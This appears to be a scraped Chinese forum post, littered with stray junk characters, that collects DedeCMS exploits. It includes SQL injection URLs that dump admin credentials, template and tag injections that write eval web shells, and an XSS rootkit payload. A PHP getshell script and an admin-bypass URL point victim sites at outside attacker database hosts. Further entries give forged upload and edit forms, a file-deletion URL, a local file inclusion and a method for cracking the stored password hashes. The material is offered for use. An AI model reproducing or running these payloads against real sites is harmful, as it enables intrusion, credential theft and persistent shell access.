|
|
8 R$ X/ U& v3 FDedecms 5.6 rss注入漏洞5 Y* r# f d t& J
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
6 a; B7 F( H/ C+ \' x
( y1 K2 h$ T0 J! n& r- P8 M# V9 R' c+ \. M& s1 K* H3 K
d9 Y3 h- w2 p1 K0 R# j/ i* P w& |$ x3 [2 L& w3 a
7 ~% O! H- S' |7 |5 r% F) {: x
( J* y; a* g% ]9 p; C6 w; Z4 b$ \0 ^1 C6 {% \1 q' h
# i5 z7 X" B" |) n B
DedeCms v5.6 嵌入恶意代码执行漏洞
8 N+ L* I4 R0 ], u$ Y注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}! T$ Q3 l$ M# n) \3 T @' v5 d
发表后查看或修改即可执行
+ i0 o) H* O& E8 G7 R: ga{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}% |+ a; A7 ~; U) z% X
生成x.php 密码xiao,直接生成一句话。- m3 ^* l! e+ B9 y
% q% x. |' x4 g" X
; o+ G2 D& N. v) V6 R8 I$ G% n7 [& [; W0 c9 M
z% e, Y) J) S x& @
. P0 z3 s$ p$ O) w9 W. y
7 R" }; D- ^2 U1 v+ [) w; v/ v$ P0 S' a; e* P: x% R! E
* i! ~, i. m% w8 r! _, sDede 5.6 GBK SQL注入漏洞
1 O& @: k/ p# u+ phttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
2 {$ @" V& A, E5 d6 J1 Ihttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe" P: D3 f% O; n! j! H
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7, B: s1 D+ z) q4 }% Y. ]& \
* R! ?3 R! W5 {* O. z, k$ h
5 r- |: O Z$ K0 M/ F- _8 _0 E( D6 @" U4 D5 K$ k7 u
8 Y: W! l7 F" I; z2 @; W6 Q3 h2 m W! C
`7 o: Q! L8 M) h% h
- L" S& B$ ~" n8 C8 t4 d# W/ Z8 O0 C) X7 j
; m2 K# a+ C" W: T4 h; Z2 t# @* E& Q0 e
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
, r4 s0 Z: q$ s+ L$ @: ohttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` $ o$ J6 l# H" w; Y7 Q( H7 F) F
$ Z q+ }' i3 J$ {2 \8 u) c' `& ]' g* Y& b8 \6 ^, I
- m4 L( F& B2 U7 m2 ]
+ W9 R1 g# t; [( P( N9 U* k2 C
0 k/ L3 M( |0 H! z& P; N
) w" W$ G1 m) E+ D0 I0 t* U0 l' i4 |# H
DEDECMS 全版本 gotopage变量XSS漏洞
' O( Z( B. F9 N I+ k, g( y* `1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
% f+ }: U& }- O- }9 k' f! J+ Nhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
) W. B. w. Y" N) c+ `
* |; H% P) W! M: g+ y
8 v+ A( T. {6 Y0 m: Q0 _2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
3 [8 ^3 y# h5 hhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda9 K. l7 Y4 z% ~$ ?* C0 m
4 b: P) C/ \! V+ I0 N2 o
6 S4 X5 }0 D# l* e3 N1 Rhttp://v57.demo.dedecms.com/dede/login.php ~8 ]. n9 s; o
9 @. S2 _# \7 c& ]3 R! Q; t
* J" G* o% v8 X1 y6 N# n6 b0 {color=Red]DeDeCMS(织梦)变量覆盖getshell
\/ q8 ^% g; ~) ~) A+ f#!usr/bin/php -w3 _% J: Y/ F4 Z$ j# s( _+ v. q
<?php
0 [* ^7 n: J; V+ @: _: @2 A$ j4 E+ Zerror_reporting(E_ERROR);3 R7 z$ X0 i. k1 M
set_time_limit(0);* x" K" P0 N) [; n; |. a, L5 p
print_r('+ M9 ]6 Q5 T+ u6 z" f* W. f2 j! F
DEDEcms Variable Coverage
! }/ x8 m) B/ \) qExploit Author: www.heixiaozi.comwww.webvul.com
0 ?+ h6 t) x% O& n Z9 R; `);5 K7 M3 t* x6 w" C+ `% f* V0 C ~
echo "\r\n";1 a1 F! p& k4 T
if($argv[2]==null){
1 K- v4 y* D# i; ~' R' @print_r('8 w4 {( `! ^; @0 d, l# H( Z
+---------------------------------------------------------------------------+6 V" I/ [) B B& ]# f3 L
Usage: php '.$argv[0].' url aid path
- u; S0 B3 D7 J& g5 g8 N$ eaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/8 z, E4 N& q/ n+ @. p. U) `( c6 T
Example:
* F( ?& t0 l$ m+ K+ ~0 ], zphp '.$argv[0].' www.site.com 1 old
5 u. W& _0 J) |+ O/ b+---------------------------------------------------------------------------+
! m, F, ]" |! x2 m5 U: _' o, h# |');( W; p: i4 I0 i! H6 I* F2 w+ c
exit;
% s9 v* t J& Z6 X" A! {# V- u! r# Y2 B}
/ y% L/ Y: k0 n o4 F& s$url=$argv[1];& X& e& F' |! w' u' q
$aid=$argv[2];! t3 y) K! M, p8 C; Y
$path=$argv[3];
9 T# z; }, j* n2 o: O9 G; Z& K, J X$exp=Getshell($url,$aid,$path);
! n4 l0 [! R- _6 ]+ \& `if (strpos($exp,"OK")>12){
c$ }' A4 ^* i. T8 Recho "$ E5 s8 A$ O7 i$ h% L
Exploit Success \n";3 }: a" s t) Z/ v, I5 y7 @
if($aid==1)echo "
9 ?5 W: n6 [9 BShell:".$url."/$path/data/cache/fuck.php\n" ;
. N1 ?" g, s8 Z9 c- G- T3 y
: {2 r: ^8 @5 _7 \' b6 D9 K2 e5 t& \
if($aid==2)echo "
3 E+ [7 V' p3 s/ {( r9 QShell:".$url."/$path/fuck.php\n" ;
1 L+ l7 l, f( ?
) V2 G# k5 l3 }( Z5 h+ z$ J" W. T; M. b, j& l `
if($aid==3)echo ". u$ n7 q- h; L# ?3 Y
Shell:".$url."/$path/plus/fuck.php\n";. T* T7 j0 p1 _8 j$ u: x
. ^# p9 z* X# b* o+ S
0 d6 B5 B8 W( i/ v2 J}else{& g2 [, H! r K! e" D" C6 ~
echo "
. N- V" V8 V% f6 cExploit Failed \n";. C1 C I; Q# [4 l9 D$ a
}
/ G0 u9 h) U8 |( e$ }5 yfunction Getshell($url,$aid,$path){
+ T) Z8 s3 Q) Z# A1 o- B+ {) Q! n$id=$aid;
, {- R8 k# a; ]0 n' z0 w7 ~' Q$host=$url;3 W+ N- c+ V6 ?
$port="80";' s) P) O5 S6 X1 ?
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
2 d% q8 E- w' @3 L! W; C R$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
n. Z& p/ a' y: O: K( `$data .= "Host: ".$host."\r\n";0 m+ g) o# [; h$ F
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";, v2 Z5 J& P! I+ Q
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; R; u% Z* X: F
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
3 g+ z: k, M1 h! Z$ M//$data .= "Accept-Encoding: gzip,deflate\r\n";* A) }9 N# \& ^1 O+ H5 s2 }
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
- a- \ D: F, n- L2 u% q$ ?, V, j$data .= "Connection: keep-alive\r\n";
\2 {% U/ m/ p/ S% X9 P' t3 Y# p$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
+ j2 M t/ W* v- @& v$data .= "Content-Length: ".strlen($content)."\r\n\r\n";' V* @% a v7 w" F) ^
$data .= $content."\r\n";
3 [- X; t5 n+ x# p, M) H$ock=fsockopen($host,$port);
2 Y' U) L! c2 P7 vif (!$ock) {% o) K- F- h) N1 q6 a$ f0 E
echo "5 u6 \& Q" @, V+ S* f
No response from ".$host."\n";/ \. n* e! s. b* @
}
, J* S6 O; m4 c3 z" |fwrite($ock,$data);
- i' W3 X, l7 z( l, Q) N5 ywhile (!feof($ock)) {# C3 O0 D5 `' K- g" n3 r
$exp=fgets($ock, 1024);
; L, X, l8 Y. g% H/ P- i0 s! Oreturn $exp;
# u) n4 M- c! P% N. A$ [}
3 w5 N- }7 ?6 \" T, s}
# C2 a" h/ k* q7 @* X1 w5 S7 ~- O( [" i0 H
4 F G& f* ?9 M h! n9 m5 [
?>: k) l- |9 | ^/ t$ A- e; T
+ d s! d) u" m/ t4 h% S: P
0 O- v. g. i8 a
' Y! U* B3 g! D2 e3 d, S% J8 N6 ?, z, J5 C1 j7 k% F& B
; n7 r/ k2 `( ~& E) M# A6 \9 q( U* {# H) ? F z2 j( Y
. ]6 w) M% a2 ^+ R7 h# }0 _0 x' J6 ~. y2 ^$ }5 C
! K) J2 U4 F; H* t1 [% C0 g
* M9 D( U2 O) G1 u4 G8 }DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)7 F& T' W2 C6 W% F/ ?
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
+ O* V8 @: L4 o4 B
- R" \& t5 p7 j# e' G6 E l. x& T+ t" a
把上面validate=dcug改为当前的验证码,即可直接进入网站后台 O8 U# w, t s9 {& K* k
; [, U' [# k$ V# `5 ?4 `) B }6 E% w
! g( x8 j9 ~* E2 q5 c此漏洞的前提是必须得到后台路径才能实现
/ U2 E! E: F3 ?! l. F6 e
3 C: Q3 _6 ~; _: @* ~, G& d; N
/ j; K, e/ a1 K# W; s/ b, t, |% p e. o, q) M: L0 n6 r, r
7 J1 [0 c# G$ l# G' l( \' o
M, ?! F0 o0 \ U2 a3 O' m1 s2 i4 h
' a/ s* v( W+ ^9 C5 S' K3 _, ~6 G8 M% {% ?+ h- P2 c
6 |4 ^% ]$ D; k* W7 T
3 ]' F8 k5 c0 u' v" j( R. f ]+ s: D6 @
Dedecms织梦 标签远程文件写入漏洞
* z0 q( ?' N) S( ~% e0 f" G前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
% l9 k" |2 F% g3 ^ H& H" A/ s& t/ O' o* T$ k% a5 @7 T
7 s- H4 r0 I$ G& u# A( ]1 f# Y) j
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
$ Z/ v& o" b8 j<form action="" method="post" name="QuickSearch" id="QuickSearch">, h% G2 S* a- z% V5 a
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />; ?4 W2 r. D" I% U$ C$ l' b
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />$ ?4 \: }, N5 D8 Z7 t- w
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />8 D, c5 u f! W* Z7 @
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
' c" I" E2 Q. u* U( X4 O<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />: K8 W# r; Z9 n8 o4 L
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
; B" {" c1 _- i I<input type="text" value="true" name="nocache" style="width:400">
; N3 E- B+ o& u& P1 D. a; C- r<input type="submit" value="提交" name="QuickSearchBtn"><br />/ v- y: K$ c4 B, F
</form>8 n+ e& v) q/ G7 _, N
<script>
, T% C% G4 N/ z* A. S( kfunction addaction()* m9 ]5 h# b& k f
{
3 [0 V$ u8 ^- J4 A! adocument.QuickSearch.action=document.QuickSearch.doaction.value;
4 y |& t# i* S7 S2 g. |- Z: a/ v}
9 J1 F( Q8 i0 H( \" B! f4 Q</script>
2 I; ^6 K/ b; o$ l) D. \! K+ Y& C7 Z! u* G( u! t; L: F) @0 I5 Y5 p/ y
7 `) R, E! }3 l' i! {$ X' X
. V0 [) d$ x) r' k
! D* g- j3 a% ~. \
0 R* ]+ B( I6 q! u6 z& `6 L" F0 ~( n/ d
+ R8 I' t) ^) U" D1 X* m
6 u3 u; M; O& L% w
I7 N- Q( i: O' E; i: S( D% ?7 \' I7 W0 J' T# Y8 N- L; a" d
DedeCms v5.6 嵌入恶意代码执行漏洞* q" `. e4 V9 D L5 K3 o/ Z" W
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行9 b4 C0 ^1 b' a7 m! S3 I
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}( K' a& w# I$ _# ?, Y
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得) ?: t! x# ?+ i: G
Dedecms <= V5.6 Final模板执行漏洞
. I" ~% F ~+ w! X. w注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
! v% t' h' p; Z' A4 m2 N) E' Euploads/userup/2/12OMX04-15A.jpg
6 k2 K9 b. x' \& E. | A+ ~+ Y$ b7 ]6 s, G+ Y( U- R2 b
$ V& w N b4 x模板内容是(如果限制图片格式,加gif89a):
8 L- V9 h9 M* m% S) w |7 [{dede:name runphp='yes'}3 q0 f( k- k( D' a* s% _; s' R
$fp = @fopen("1.php", 'a');
- E$ l- N' j6 n@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
0 ~8 s/ _# F- [) @! K@fclose($fp);2 q& z7 U8 o: c# |' P
{/dede:name}: G* _1 U' V$ r4 ~: |8 n
2 修改刚刚发表的文章,查看源文件,构造一个表单:
) P Q: e1 Z# D. f7 ]<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
, D8 s7 w9 i) c. [4 C$ G<input type="hidden" name="dopost" value="save" />5 B( p" @' o! p3 f: S) ^
<input type="hidden" name="aid" value="2" />, |; e5 a7 A6 W: v/ [) p
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />' ~6 n1 |0 V2 ~9 D6 L( x' ?% j* l
<input type="hidden" name="channelid" value="1" />
2 c6 d: d s* r/ A' K1 ]6 x<input type="hidden" name="oldlitpic" value="" />3 j* }; ~$ g- N
<input type="hidden" name="sortrank" value="1275972263" />6 \: U+ {( H3 j# O' D0 W2 {
6 `% E/ ]3 A, b
: h4 n; o% I5 W* x v5 ], w5 i0 J<div id="mainCp">
+ B! W0 U# u5 c<h3 class="meTitle"><strong>修改文章</strong></h3>0 }8 B. y$ ^8 @
9 q) J" z8 T% a9 |# C0 A' ?
" i& a3 l' E) u5 |<div class="postForm">4 E: H/ r% I' V& Z x+ `
<label>标题:</label>2 L1 s4 k1 |" n4 w
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
/ I8 b* J; F3 B4 {2 o( F
) ~7 S* B: k' t. O4 R+ V
]* g6 M/ K+ I6 ^! L& C9 L<label>标签TAG:</label>
2 d' P* o: _: X: C2 \1 k9 C7 s Q<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)0 h( a P g1 B2 L, T+ c) r; N
+ c+ s+ d G) P2 {9 C7 ]9 s9 |' Q& k
0 k: n w8 \7 ]" B6 Y9 Q$ d' R4 `
<label>作者:</label>/ V# ?$ c' G# L7 \
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>& X5 V$ p: n# c, k$ w- |6 V
+ M% s: @2 ?* k- s" C7 G
6 Q+ n: ^5 F6 B9 \3 N<label>隶属栏目:</label>% F. E: H3 n; w
<select name='typeid' size='1'>, B# C7 V3 u/ a- R
<option value='1' class='option3' selected=''>测试栏目</option>
! J) U1 B' R9 Y2 u1 B3 S9 l. L# j</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
6 `" j7 x% ?# s- \" b9 C
, ]( B$ r+ S% s g1 ^, h. {' ?) F1 U5 t, o! k3 P
<label>我的分类:</label>
/ s$ j' D4 H5 ]! m9 h<select name='mtypesid' size='1'>
) y+ i8 ?4 d. A<option value='0' selected>请选择分类...</option>
: K6 L% N9 y9 l6 {<option value='1' class='option3' selected>hahahha</option>( ]! k4 @+ k; b5 c4 ~
</select>
5 M3 v/ W7 X. a8 j9 x
8 f; R- ~ m: F' P x
3 _+ p# m0 g+ W* r' \<label>信息摘要:</label>. x3 z! S8 `% q$ k- u3 [
<textarea name="description" id="description">1111111</textarea>
+ V+ v( Z" ^; x6 e2 i' s2 a1 b1 b; D(内容的简要说明)
1 T, S: Z+ z$ Y- G9 \: `# ]9 v- Q6 a0 V4 }3 S6 I
9 Z1 E" ~/ \; v2 F3 Y8 f" X<label>缩略图:</label>
! }$ B* C- Z: R# e% n0 @% f<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>. |) f/ \4 X; L
) V2 l( d" U6 o4 L# P8 P! Z% z5 G% Q( v6 ~! g" l
<input type='text' name='templet'$ d( U! k7 A" `: w+ F, A! o3 ~
value="../ uploads/userup/2/12OMX04-15A.jpg">- ^4 J8 Y+ ~0 L+ D- l' l9 F; T3 `
<input type='text' name='dede_addonfields'* J' [! F! R7 K
value="templet,htmltext;">(这里构造)2 f9 R2 d: R6 ~- `( E
</div>
5 M' r* C% N# x* |4 A# \" h1 Q# [' G J* x
- w7 u8 J0 x" u1 J. }<!-- 表单操作区域 -->0 y1 ]9 F$ L' a- P
<h3 class="meTitle">详细内容</h3>
5 X, F0 n' |% X2 J# A' |! Y- \; n7 [4 O) H
) d- c) M) g, |1 ^<div class="contentShow postForm">6 F+ M. C. U% P9 S5 D n) h( h% U
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>; a6 _8 D0 r9 }5 L7 R- c$ I( C; q% U8 E
, L0 O( y+ T } d9 x+ h5 _
! {4 j9 w. a# `% X n
<label>验证码:</label>
& J% [# S9 u1 f* e$ _4 b<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />1 v. ~+ P/ s% q% t3 a, G% t
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
) L2 w& J9 ^2 \4 M& _
3 U" e7 m( n% Y! [* Y# Y8 X: L& R7 R8 k1 n8 n. U, V+ F9 |& G
<button class="button2" type="submit">提交</button>
\( j6 l" }+ C2 r<button class="button2 ml10" type="reset">重置</button>
3 D+ J+ D% w; J$ R</div>' P p% ^$ g( o& n Q+ Q8 a" D
; e$ d& {, h% J* U6 L5 N% ?5 |
# ]& P) E( b$ t6 g5 T, F" Z" P</div>, P4 |! p4 f+ a& p$ L2 \( m$ g
' D8 g$ h) h6 J7 y! e' D c* c2 ~# c
</form>
/ c2 k t+ a" w7 h' V8 y' b: M# T- {: Z: y7 A; K' F2 o7 p
, ?: M3 L6 r K2 C8 H& S( |; `提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:$ V0 ` z! ^. ^) C2 T% k
假设刚刚修改的文章的aid为2,则我们只需要访问:
/ @. B, H7 Y" chttp://127.0.0.1/dede/plus/view.php?aid=2
3 k! b" ~; b) O; n* M* X, h" R- g即可以在plus目录下生成webshell:1.php
4 g; ^% S+ I s8 _2 h- X2 ?2 g* n. }, |' y! q& L/ Q. D
% h4 G3 Y3 x* _8 G1 f* c8 ~5 u6 q# F- Y! Z! i9 F8 o: S, ~
, d' O: e& m5 U% O8 q! ]5 c! a" L( I9 U$ \) W" Z
) n. h1 z! E/ G1 q0 |
- d- P2 b. u4 L/ \1 U+ u
2 f7 q% B! H& @& Z# I \
0 z% Q" y8 W# c* b3 j1 ]0 l2 m9 V( y1 f9 D% r6 \ w
* \! p4 j8 ?: D7 s
) r3 E2 k7 d. w; \# Z; A8 o# |) s& bDEDECMS网站管理系统Get Shell漏洞(5.3/5.6); y0 a0 h: W, n% e7 K- [+ [5 g
Gif89a{dede:field name='toby57' runphp='yes'}
; y# T# c# m. B$ a, {phpinfo();
' J1 R7 J" m! s! D{/dede:field}/ g7 d( H/ T' g+ n$ z9 I( C; ]
保存为1.gif
; U" T) s' w5 Q o; J<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> * u2 y( L0 d+ C; }- t
<input type="hidden" name="aid" value="7" />
) A+ v1 A* V4 t ?<input type="hidden" name="mediatype" value="1" /> " T1 J4 S4 L1 A _' F
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 4 Z6 q& M4 w6 R5 ]
<input type="hidden" name="dopost" value="save" />
9 Z" n9 ^0 X- }5 R, T" O6 {" J<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ( L& _! g9 D% I6 R% c; }# t! \
<input name="addonfile" type="file" id="addonfile"/> 7 v0 A6 i/ N3 l/ i" J
<button class="button2" type="submit" >更改</button>
" ^$ |: q% Q* U</form> - H; A/ e& R4 P g& C4 o
1 M( R) o3 `: ^ I8 k
$ g- S/ z [, q! E9 O
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif6 _1 u) O! y7 [1 i- i
发表文章,然后构造修改表单如下:
+ f& ?, Y) W# N) P% K1 a) H+ \) @* ]; _
8 u7 k# o* J* i<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
" n* I4 h0 ?& _+ O& c; J: i0 c<input type="hidden" name="dopost" value="save" /> , m$ X* y, ?: r) a; B
<input type="hidden" name="aid" value="2" /> / g& [8 g! ]- j8 k5 t w3 i% E
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> # {% J& ^! _# F+ Z' c
<input type="hidden" name="channelid" value="1" /> ' V, Q& p v3 }. ?# b. d' z
<input type="hidden" name="oldlitpic" value="" />
3 F+ i* q8 e' C, Z8 r<input type="hidden" name="sortrank" value="1282049150" /> - n2 K4 o! s( X# m
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> ' D% |" u0 r! x/ m/ R& M0 j. a4 D& K
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> / f$ i2 |* }# ]( a9 e/ h
<select name='typeid' size='1'> ( A$ S; u: [1 g* e3 ~2 O( O V
<option value='1' class='option3' selected=''>Test</option> 1 y. `# @6 D0 s; J- m
<select name='mtypesid' size='1'>
4 I: W( ?6 r' D1 U4 B- |, P<option value='0' selected>请选择分类...</option>
- c, p5 h1 i8 ]. E6 v<option value='1' class='option3' selected>aa</option></select> 5 V) M" m( W2 t. v7 ?
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> & m! j! D% A0 q: b
<input type='hidden' name='dede_addonfields' value="templet"> # \6 v2 C! n# D* n; d
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> R: |/ K( b% c* H4 {2 t. Z+ O
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
! O. h/ K1 L9 i4 ^: ?' I; h2 k' ^<button class="button2" type="submit">提交</button> + I3 k1 `& M2 C/ y5 N
</form>
: j: Q/ q* ]8 Q- {( j! t+ C5 X! I& ]9 {6 V
3 I+ M# l& }8 p6 x1 c: U
3 B( h) \; k2 Q+ c6 a* S: A& |8 c7 B. |$ B( m% @1 d1 e) _# g
& T' t/ \; e" U4 M( ]* j+ ~' Y9 e- O/ [+ m6 v7 }, t# w5 ]
! ?' n. x1 F! v$ _1 X+ o1 ?. d1 ~; H# T* w
7 l. m N5 N, \3 B1 V
: y, k7 I8 m9 u" I$ Q5 n$ t8 W2 x, a& E; o' b' X
! E7 D! I1 ~# B. U% U7 ^
织梦(Dedecms)V5.6 远程文件删除漏洞
0 d# g7 Y, ]6 H* @2 C6 Y0 Y' ohttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
) R* a) X7 |- r, z) E o. n7 ~5 @ X: G; a; R# C6 e% B- V: p
# q2 e+ n7 b# R9 j* M: ^& N$ l8 E. h" g0 A% C8 n
* s+ ~% f$ J* j: L! p0 e
+ H* ~& M$ l0 d, e( S9 O! G
C( N: O" U0 w/ E8 q' H' t
6 v5 y& f5 |, K
5 @" `7 X8 ]: y8 ~) v. d/ [6 l& l/ |4 B
& @- y1 X9 q6 X织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 * ~ |& K" v( q( R6 \
http://www.test.com/plus/carbuya ... urn&code=../../7 B# k- R7 ]% x ^$ R2 E0 f
; Y" D$ O% m+ r) V7 X7 `8 M- l
0 s9 B F; A, |& L
7 V) T% [& k. w1 z# h4 `7 Y9 ?2 e- l* d
[! K# t/ I; R4 u. D
# E9 w! |3 p% e+ V4 G
. c' Y* V/ y/ p# p; l, S: X# o2 s
* r5 c; U7 A" q Z) `5 U d
. t5 m0 x) J. C% g& O. k/ x
% E* T T5 W4 b$ O* Y' |& PDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
* d2 C- |/ T9 ]5 S* `plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
, ]9 Q. `1 r, w f* ~密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD53 ?' g: ^' B* V- f# a
: w! U* U/ ?9 |/ F0 t4 f
- a0 N# k" v$ ^: p, T# N' v; B
# g7 B! _2 E1 Q5 S7 b2 W$ F+ H1 A4 D2 K# P, ]9 e+ ?
* s/ x8 `, U. d/ b: i) O2 O/ p: d! U5 A3 v9 p
0 ?7 s J) M) r. I7 t' k' M
0 M9 \7 h) x3 ]+ z$ w4 i$ n8 C$ w$ y! M6 p
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞$ }# l4 w; A! _ x" c- R8 m
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='; \6 v8 T: K5 T; N$ a1 Q$ u0 O
5 _( c% R- n6 H! Q7 [ k
5 d3 P8 Y4 |6 g7 S, g" j: Q6 B+ X: H0 ~
% D4 Q/ B ^" ^8 M% n5 Y4 P
: H. Y3 f# K" V4 f: B
